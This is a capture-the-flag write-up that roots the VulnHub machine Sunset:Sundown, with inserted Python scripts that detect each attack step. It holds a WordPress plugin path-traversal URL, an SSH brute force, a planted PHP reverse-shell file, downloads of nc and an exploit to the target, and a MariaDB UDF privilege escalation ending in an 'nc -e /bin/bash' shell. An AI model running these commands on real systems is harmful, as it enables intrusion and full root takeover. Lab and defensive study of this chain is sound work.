[VULNHUB] Sunset:Sundown

Today we are going to hack the VulnHub machine called Potato. You can download it from the following link: Sunset:Sundown

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.20                                                  
                                                                               
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-11 11:17 CEST
Nmap scan report for 192.168.1.20
Host is up (0.00028s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
|   256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
|_  256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Sundown – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds
Nmap shows that robots.txt has one disallowed entry: /wp-admin. We dig in with wpscan to see whether anything interesting turns up!

~ > wpscan --url http://192.168.1.20
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.1.20/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.1.20/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://192.168.1.20/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.1.20/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.1.20/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.1.20/feed/, https://wordpress.org/?v=5.4.2
 |  - http://192.168.1.20/comments/feed/, https://wordpress.org/?v=5.4.2

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.1.20/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.20/wp-content/plugins/wp-with-spritz/readme.txt

[+] Finished: Fri Sep 11 11:18:58 2020
[+] Requests Done: 52
[+] Cached Requests: 7
[+] Data Sent: 11.176 KB
[+] Data Received: 300.866 KB
[+] Memory used: 194.34 MB
[+] Elapsed time: 00:00:08
We see there is a plugin installed: wp-with-spritz. Looking up more information about it, we find that it is vulnerable[1]. Let's put it into practice :)

http://192.168.1.20/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd

In the /etc/passwd file we can see that a user called carlos exists, so we check whether we can obtain his password using hydra.
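Before moving on to the password step: the traversal request above is easy to spot in the web server's access log. The following Python script is an added example for this writeup (it is not part of the original post, nor code from the plugin); it parses constructed Apache combined-format log lines and flags requests to wp.spritz.content.filter.php whose url= parameter is not a remote http(s) URL, percent-decoding repeatedly first so encoded variants are seen in their final form. The sample log lines and the VULNERABLE_SCRIPT name are assumptions based on the request shown above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (combined log format); not taken from the page.
# Lines 1-2 request the plugin's filter script with a traversal path (plain and
# percent-encoded), line 3 passes a normal remote URL, line 4 is an unrelated page,
# line 5 passes a bare local path without "..".
SAMPLE_LOG = """\
192.168.1.59 - - [11/Sep/2020:11:20:01 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/passwd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.1.59 - - [11/Sep/2020:11:20:05 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.168.1.59 - - [11/Sep/2020:11:20:09 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.org/article HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.59 - - [11/Sep/2020:11:20:12 +0200] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.168.1.59 - - [11/Sep/2020:11:20:15 +0200] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/hostname HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed name of the script whose url= parameter we want to police.
VULNERABLE_SCRIPT = "wp.spritz.content.filter.php"


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so multiply-encoded traversal sequences are seen in
    their final form. Stops as soon as another round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_url_param(value):
    """Return a short reason if the url= value does not look like a legitimate remote
    article URL, otherwise None. Only http(s) URLs are acceptable for this plugin."""
    decoded = fully_decode(value)
    parts = urlsplit(decoded)
    if parts.scheme in ("http", "https"):
        return None
    if ".." in decoded.replace("\\", "/").split("/"):
        return "path traversal"
    if parts.scheme:
        return "non-http scheme " + parts.scheme
    if decoded.startswith("/"):
        return "local absolute path"
    return None


def find_lfi_attempts(log_text):
    """Scan access-log text and return one dict per suspicious request to the plugin."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or VULNERABLE_SCRIPT not in m.group("target"):
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs already decodes one layer; fully_decode handles the rest
        for raw in parse_qs(query, keep_blank_values=True).get("url", []):
            reason = classify_url_param(raw)
            if reason:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "reason": reason,
                    "path": fully_decode(raw),
                })
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['reason']}: {hit['path']} (HTTP {hit['status']})")
```

Run it as-is to print the three hits from the constructed sample; against a real access log, any hit is worth an alert, because the plugin only ever needs a remote article URL. The same allow-list rule (scheme must be http or https, no local paths) is what a fixed version of the plugin should enforce server-side before fetching anything.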

~ > hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-11 11:26:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.20:22/
[22][ssh] host: 192.168.1.20   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-11 11:27:06
We see the password is the same as the username. Let's log in!
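On the defensive side, the hydra run above leaves a very recognisable trail in /var/log/auth.log: a burst of "Failed password" lines from one source, followed by an "Accepted password" line from the same source. The script below is an added example (not from the original post); it runs a sliding-window count over constructed auth.log lines, raises one alert when a source crosses the failure threshold, and a second, more serious one if that same source then logs in successfully. The sample lines, the threshold and window defaults, and the year supplied to the syslog timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt (not from the page): six failed logins for carlos
# from one source within a few seconds, one unrelated failure from another host, then
# a successful login from the first source.
SAMPLE_AUTH_LOG = """\
Sep 11 11:26:56 sundown sshd[1201]: Failed password for carlos from 192.168.1.59 port 40122 ssh2
Sep 11 11:26:56 sundown sshd[1203]: Failed password for carlos from 192.168.1.59 port 40124 ssh2
Sep 11 11:26:57 sundown sshd[1205]: Failed password for carlos from 192.168.1.59 port 40126 ssh2
Sep 11 11:26:58 sundown sshd[1207]: Failed password for carlos from 192.168.1.59 port 40128 ssh2
Sep 11 11:26:59 sundown sshd[1209]: Failed password for carlos from 192.168.1.59 port 40130 ssh2
Sep 11 11:27:00 sundown sshd[1211]: Failed password for invalid user admin from 192.168.1.77 port 51000 ssh2
Sep 11 11:27:01 sundown sshd[1213]: Failed password for carlos from 192.168.1.59 port 40132 ssh2
Sep 11 11:27:06 sundown sshd[1240]: Accepted password for carlos from 192.168.1.59 port 40160 ssh2
"""

# Matches both "Failed password for USER from IP" and "Failed password for invalid user USER from IP".
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_syslog_time(stamp, year=2020):
    """Syslog timestamps carry no year; the caller supplies it (assumed 2020 here)."""
    return datetime.strptime(f"{year} {' '.join(stamp.split())}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return alerts for sources with >= threshold failures inside the window, plus a
    second alert if such a source then authenticates successfully."""
    recent_failures = defaultdict(list)  # source ip -> failure timestamps still inside the window
    burst_reported = set()
    alerts = []
    for line in log_text.splitlines():
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = parse_syslog_time(m.group("ts"))
        ip, user, event = m.group("ip"), m.group("user"), m.group("event")
        # drop failures that have aged out of the sliding window
        window = [t for t in recent_failures[ip] if (ts - t).total_seconds() <= window_seconds]
        if event == "Failed":
            window.append(ts)
            if len(window) >= threshold and ip not in burst_reported:
                burst_reported.add(ip)
                alerts.append({"kind": "bruteforce-burst", "ip": ip, "user": user, "failures": len(window)})
        elif len(window) >= threshold:
            # a success right after a burst is the password-guessing outcome we care about most
            alerts.append({"kind": "success-after-burst", "ip": ip, "user": user, "failures": len(window)})
        recent_failures[ip] = window
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The "success-after-burst" alert is the one to page on: it is exactly the carlos/carlos outcome above. Key-only authentication or fail2ban-style blocking removes the precondition altogether; this check is for noticing when neither is in place.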

Low Shell



~ > ssh carlos@192.168.1.20                                                   
                                                                              
carlos@192.168.1.20's password: 
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  3 19:39:26 2020 from 192.168.100.139
carlos@sundown:~$ 

user.txt



carlos@sundown:~$ cat local.txt 
28f84888f6bd690e321cba14659b32f2
carlos@sundown:~$ 
We want to read wp-config.php, which usually holds the password used to connect to MySQL. Our user carlos does not have permission to read it, but www-data does. So we create a .php file reachable from the web that gives us a reverse shell; that way we become www-data and can read the file.

carlos@sundown:/var/www/html/wordpress$ nano e.php
carlos@sundown:/var/www/html/wordpress$ cat e.php 
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.1.59/5555 0>&1'"); ?>
carlos@sundown:/var/www/html/wordpress$ 
We set nc listening.

~ > nc -nlvp 5555
listening on [any] 5555 ...
We browse to http://192.168.1.20/e.php

~ > nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 35710
bash: cannot set terminal process group (503): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sundown:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@sundown:/var/www/html/wordpress$ 
Now that we are the www-data user, let's look at wp-config.php!

www-data@sundown:/var/www/html/wordpress$ cat wp-config.php
/** MySQL database password */
define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );
We now have the password to connect to MySQL as root. On top of that, we see that the mysql user has root privileges!

Privilege Escalation


We will use a UDF[2] to get a reverse shell through MySQL and so obtain a shell with root privileges. We download and compile it.

wget http://0xdeadbeef.info/exploits/raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
We move the raptor_udf2.o file to our web server so that it is reachable.

sudo mv raptor_udf2.o /var/www/html
On the target we download the nc binary and the raptor_udf2.o file we just moved to our web server.

cd /tmp
curl -o nc http://192.168.1.59/nc
curl -o raptor_udf2.o http://192.168.1.59/raptor_udf2.o
Now we start the steps to get the reverse shell. We connect to MySQL.

carlos@sundown:/tmp$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 19
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
We select the mysql database.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
We run the following statements.

MariaDB [mysql]> create table foo(line blob);
Query OK, 0 rows affected (0.029 sec)

MariaDB [mysql]> insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.005 sec)

MariaDB [mysql]> show variables like '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [mysql]> select * from foo into dumpfile "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so";
Query OK, 1 row affected (0.000 sec)

MariaDB [mysql]> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [mysql]> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.000 sec)
With the previous steps done, we set nc listening.

~ > nc -nlvp 4444
listening on [any] 4444 ...
Finally, in MySQL we run:

MariaDB [mysql]> select do_system('/tmp/nc 192.168.1.59 4444 -e /bin/bash &');
And we get our privileged shell :)

~ > nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 49818
id
uid=0(root) gid=0(root) groups=0(root)
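What made the UDF step work is server configuration rather than a MariaDB bug: mysqld running as root, no secure_file_priv restriction (so SELECT ... INTO DUMPFILE may write straight into plugin_dir), and a client account allowed to CREATE FUNCTION. The script below is an added example (not from the original post); it parses constructed client output of the SHOW VARIABLES and mysql.func queries used above, plus a constructed ps line for the server process, and reports each of those conditions. The sample tables, the ps line and the empty known_udfs allow-list are assumptions; only the plugin_dir path and the do_system row mirror what the page shows.

```python
# Constructed client output, modelled on the ASCII tables the mariadb client prints
# (not the page's own output, although plugin_dir and the do_system row match it).
VARIABLES_TABLE = """\
+------------------+---------------------------------------------+
| Variable_name    | Value                                       |
+------------------+---------------------------------------------+
| plugin_dir       | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity  | gamma                                       |
| secure_file_priv |                                             |
+------------------+---------------------------------------------+
"""

FUNC_TABLE = """\
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
"""

# Constructed `ps aux` line for the database server process (assumed values).
MYSQLD_PS_LINE = "root       612  0.2  8.1 1210924 82012 ?  Ssl  11:00   0:01 /usr/sbin/mysqld"


def parse_client_table(text):
    """Turn the ASCII table printed by the mysql/mariadb client into a list of row dicts."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue  # skip the +----+ border lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def audit_mariadb(variables_table, func_table, mysqld_ps_line, known_udfs=frozenset()):
    """Return findings explaining why a UDF loaded through SQL would run as root here."""
    findings = []
    variables = {r["Variable_name"]: r["Value"] for r in parse_client_table(variables_table)}

    # 1. A UDF runs inside mysqld, so the server's own account is the ceiling of the damage.
    if mysqld_ps_line.split()[0] == "root":
        findings.append("mysqld runs as root: any loaded UDF executes as root")

    # 2. An empty secure_file_priv puts no limit on LOAD_FILE / SELECT ... INTO DUMPFILE
    #    paths, which is what lets a client write a library into plugin_dir from SQL.
    secure_file_priv = variables.get("secure_file_priv", "")
    plugin_dir = variables.get("plugin_dir", "")
    if secure_file_priv == "":
        findings.append("secure_file_priv is empty: SQL can write files anywhere mysqld can, including plugin_dir")
    elif secure_file_priv.rstrip("/") == plugin_dir.rstrip("/"):
        findings.append("secure_file_priv points at plugin_dir: file exports land where libraries are loaded from")

    # 3. Every registered UDF should be on an allow-list; anything else deserves a closer look.
    for row in parse_client_table(func_table):
        if row["name"] not in known_udfs:
            findings.append(f"unexpected UDF '{row['name']}' loaded from {row['dl']}")
    return findings


if __name__ == "__main__":
    for finding in audit_mariadb(VARIABLES_TABLE, FUNC_TABLE, MYSQLD_PS_LINE):
        print("[!]", finding)
```

A hardened host answers all three findings: run mysqld under the mysql account, set secure_file_priv to a dedicated directory, and keep plugin_dir writable only by root so even an INTO DUMPFILE from the server account cannot drop a library there. Any row in mysql.func that the allow-list does not explain deserves the same attention as a new setuid binary.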

root.txt



cd /root
ls
proof.txt
cat proof.txt
                              _____,,,\//,,\\,/,
                             /-- --- --- -----
                            ///--- --- -- - ----
                           o////- ---- --- --
                           !!//o/---  -- --
                         o*) !///,~,,\\,\/,,/,//,,
                           o!*!o'(\          /\
                         | ! o ",) \/\  /\  /  \/\
                        o  !o! !!|    \/  \/     /
                       ( * (  o!'; |\   \       /
                        o o ! * !` | \  /       \
                       o  |  o 'o| | :  \       /
                        *  o !*!': |o|  /      /
                            (o''| `| : /      /
                            ! *|'`  \|/       \\
                           ' !o!':\  \\        \
                            ( ('|  \  `._______/
////\\\,,\///,,,,\,/oO._*  o !*!'`  `.________/
  ---- -- ------- - -oO*OoOo (o''|           /
    --------  ------ 'oO*OoO!*|'o!!          \
-------  -- - ---- --* oO*OoO *!'| '         /
 ---  -   -----  ---- - oO*OoO!!':o!'       /
 - -  -----  -  --  - *--oO*OoOo!`         /
   \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)

End


And with that we are root on the machine.

[1] https://www.exploit-db.com/exploits/44544
[2] https://redteamnation.com/mysql-user-defined-functions/